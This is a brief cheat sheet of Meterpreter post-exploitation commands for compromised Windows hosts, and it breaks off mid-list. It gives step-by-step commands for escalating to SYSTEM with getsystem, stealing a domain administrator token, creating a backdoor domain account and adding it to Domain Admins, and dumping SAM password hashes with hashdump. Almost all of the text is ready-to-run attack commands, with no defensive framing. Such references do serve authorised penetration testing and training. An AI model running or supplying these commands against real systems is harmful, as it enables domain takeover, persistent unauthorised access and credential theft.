Meterpreter Post Exploitation Commands

Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > use priv
meterpreter > getsystem

Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:

meterpreter > ps

meterpreter > steal_token 1784
meterpreter > shell

C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN

Dump password hashes from the SAM database:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump


On Win2k8 you may need to migrate to a process that is running as SYSTEM if -getsystem and hashdump throw exceptions.

Automigrate to a separate process:

meterpreter ...

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